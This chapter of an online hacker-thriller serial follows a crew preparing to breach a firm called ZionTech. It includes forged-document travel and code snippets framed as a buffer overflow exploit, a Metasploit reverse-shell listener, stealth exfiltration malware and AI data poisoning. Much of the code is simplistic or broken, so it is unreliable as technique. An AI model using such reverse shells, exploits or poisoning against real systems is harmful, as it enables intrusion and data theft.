Chereads / The Devil in The Code / Chapter 40 - Day 2: The Journey Begins

Chapter 40 - Day 2: The Journey Begins

The morning sun filtered through the curtains as Samanta pulled herself out of bed, the calm of the previous night giving way to the tension of the day ahead. Today, the on-field team would travel to the United States, where the real challenge awaited.

The team converged at a small park in Makati, their designated meeting spot. Each arrived from a different hotel, maintaining the separation that had been part of their cover stories. As they gathered under the shade of a large acacia tree, Samantha (Cipher) gave them a quick nod.

"Glad to see everyone made it. Let's stick to the plan and move quickly," she said, her tone brisk.

"The airport's our next stop—no room for delays."

Their destination:

Ninoy Aquino International Airport (NAIA).

With passports and cover identities firmly in hand, they made their way toward the terminal. Their roles had been carefully crafted, and each of them had a story—a purpose for this journey that would draw no suspicion.

On-Field Team in the Philippines

1. Gear Check and Packing

Before leaving, Bobby (ShadowLock), Jerry (GearTech), and Rommel (TechSpark) meticulously checked their equipment, ensuring everything was packed and disguised as normal luggage. The tools of their trade—signal jammers, mini surveillance cameras, and bug detectors—were all tucked away in cases that blended seamlessly with everyday electronics.

Rommel took extra precautions, modifying the jammer frequencies to match ZionTech's systems, ensuring their tools would remain undetectable once deployed.

2. Communications and Network Testing

Christy (Echo) ran a final test on their encrypted communication devices, confirming that all channels were secure and redundant. She knew that once they were in the United States, reliable communication would be their lifeline.

"No room for errors," she muttered as she checked the secure channels one last time.

As a precaution, Christy monitored chatter around major airports for any last-minute changes to security protocols. She was prepared to adapt to heightened security at the border if needed.

3. Document Review and Cover Stories

As they prepared to leave, Samantha (Cipher) reviewed their travel documents and cover stories once more. The team rehearsed their personas—posing as tech specialists attending a legitimate cybersecurity conference in San Francisco. This cover allowed them to carry sophisticated equipment without drawing suspicion.

Samantha looked at the group and reminded them,

"Stick to your roles. If anyone asks, you're here for the conference. We'll split up upon arrival. Stay in character, and remember the rendezvous point."

4. Final Check-Ins

Before leaving for the airport, Samantha reached out to her contacts in San Francisco. She confirmed that the safe house was secure, verifying all emergency protocols and making sure there were no red flags in the local area. Everything was set for their arrival.

At Ninoy Aquino International Airport (NAIA)

Once they arrived at the airport, the team moved through the terminal smoothly, their forged documents and carefully crafted cover identities holding up under scrutiny. As they passed through customs, each of them maintained their composure.

Samantha (Cipher) kept a close eye on the travel documents as they were inspected. She knew the risks—one wrong move at customs could unravel the entire operation. Her fingers tightened around her passport as the officer examined it, her mind racing through backup plans.

"Just breathe," she whispered under her breath as the officer gave a cursory nod and waved her through.

"One step closer."

Arrival at San Francisco International Airport (SFO), USA

The team landed in San Francisco in the early hours of the morning. They passed through immigration without incident, their fabricated backgrounds holding up as expected. Each member moved separately, adhering to their cover stories until they regrouped at a designated park near the airport.

Once they were together, Samantha did a quick security sweep, ensuring the area was clear of any potential threats or unwanted surveillance.

"Looks clear," she said into her encrypted earpiece, her voice steady.

"We're good to go."

Christy (Echo) immediately set up the communication devices, running diagnostics to ensure the local networks were secure.

"Comms are up," she reported.

"No interference so far."

Bobby (ShadowLock), having scouted the perimeter of ZionTech's headquarters, reported on his findings. His eyes had taken in every detail of the building—the exits, the security cameras, and the guard shifts.

"No changes from last time. All clear," he whispered over the communication channel.

Rommel (TechSpark) and Jerry (GearTech) unpacked their equipment, running diagnostics on the covert gear to ensure it was in top condition.

"Everything's operational," Jerry confirmed as Rommel nodded in agreement.

Remote Team at Headquarters (Philippines)

While the on-field team was en route to the USA, the remote team in the Philippines continued fine-tuning their digital preparations for the mission. Their coordination was crucial to ensure that everything was ready by the time the on-field team arrived in San Francisco.

1. Monitoring ZionTech's Systems

Angelica (DataHawk) sat in front of her multi-screen setup, her fingers rapidly moving across the keyboard. She used a combination of OSINT (Open Source Intelligence) tools to gather intel on ZionTech's internal activities. The primary tool she relied on for continuous monitoring was Maltego, which allowed her to map connections between employees, subsidiaries, and infrastructure.

To stay updated on potential vulnerabilities, she wrote a Python script that fetched the latest entries from the CVE (Common Vulnerabilities and Exposures) database:

Python Code

import requests

# Fetch latest vulnerabilities from the CVE database

cve_url = "https://cve.circl.lu/api/last"

response = requests.get(cve_url)

vulnerabilities = response.json()

# Check for vulnerabilities related to ZionTech software

for vuln in vulnerabilities:

if "ZionTech" in vuln['summary']:

print(f"[!] Vulnerability found: {vuln['id']} - {vuln['summary']}")

"No critical vulnerabilities yet, but I'll keep scanning," Angelica muttered to herself, eyes never leaving the screen.

She added another layer of monitoring using Shodan, scanning for any exposed services associated with ZionTech's network.

Bash Code

# Shodan query for exposed services

shodan search "org:ZionTech" --fields ip_str,port,product

2. Finalizing Digital Entry Strategies

Across the room, Zark (Devil in The Code) was deep in concentration, analyzing ZionTech's network for exploitable weaknesses. He was using Burp Suite, a popular web vulnerability scanner, to map out potential entry points in their firewalls.

Zark typed furiously as he worked on a Python script to exploit a known buffer overflow vulnerability in one of ZionTech's outdated systems:

Python Code

import socket

# Target information

target_ip = "192.168.0.101"

target_port = 9999

buffer = b"A" * 1024 + b"\x90" * 16 # NOP sled

# Creating socket connection

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:

s.connect((target_ip, target_port))

s.send(buffer)

response = s.recv(4096)

print("[+] Exploit sent, response received:", response.decode())

"Buffer overflow exploit is good to go," Zark said, reviewing the output.

"We'll have an entry point once we're in."

Meanwhile, Roy (BreachMaster) configured a reverse shell using Metasploit, a penetration testing tool. He set up a listener to maintain control of the compromised system once Rony executed the breach.

Bash Code

# Setting up Metasploit reverse shell

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.1.10

set LPORT 4444

exploit

Roy adjusted the payload to evade ZionTech's Intrusion Detection System (IDS) by randomizing packet sizes and staggering transmission intervals.

3. Simulating ZionTech's Defenses

Rene (BugPlay) was writing malware in C++, which was designed to blend in with legitimate network traffic and exfiltrate sensitive data once inside ZionTech's network. His code focused on making the malware undetectable to traditional antivirus systems.

CPP Code

#include

void StealthMode() {

ShowWindow(FindWindowA("ConsoleWindowClass", NULL), 0);

}

int main() {

StealthMode();

// Code to exfiltrate data here

return 0;

}

He tested the malware in a sandbox environment, ensuring that it mimicked legitimate processes running on ZionTech's servers.

"Malware is ready," he called out, making final adjustments.

"If it's detected, it'll self-destruct automatically."

Dominic (Decompiler) and Dezer (CryptoKnight) worked together to match ZionTech's encryption standards, ensuring any data payloads sent during the operation would blend seamlessly with their traffic. They used a combination of GPG and OpenSSL for encryption:

Bash Code

# Encrypting payload with OpenSSL

openssl enc -aes-256-cbc -salt -in payload.txt -out payload.enc

"We're invisible now," Dezer remarked, looking at Dominic.

4. Network Security Testing

Ricardo (NetRock) was configuring secure VPN channels using OpenVPN, ensuring all data between the on-field team and headquarters was encrypted and routed through multiple servers to mask their origin. He ran a script to establish a backup VPN channel in case the main line was compromised.

Bash Code

#!/bin/bash

openvpn --config /etc/openvpn/securechannel.conf &

sleep 2

echo "Backup VPN channel established."

"Backup's ready," Ricardo confirmed, fine-tuning the encryption settings to ensure multi-layered security.

"We'll switch to the backup if anything feels off."

5. Data Poisoning and AI Security Prep

At the far end of the room, Glaiza (AIRebel) and Mike (CodeMimic) were preparing poisoned datasets using TensorFlow. Their goal was to manipulate ZionTech's AI-based intrusion detection system by injecting adversarial examples that would confuse the AI into misclassifying legitimate activities as threats, and vice versa.

Glaiza modified the datasets, adding subtle noise to fool the system:

Python Code

import tensorflow as tf

def generate_adversarial(input_data, epsilon=0.01):

noise = epsilon * tf.sign(tf.random.normal(input_data.shape))

return input_data + noise

adversarial_data = generate_adversarial(normal_data)

She grinned at the screen.

"The AI won't know what hit it."

As the remote team worked tirelessly through the day, each person's efforts ensured that when the on-field team arrived in San Francisco, they would have full digital support and surveillance at their fingertips. Every line of code, every tool, and every backup system was tested and ready.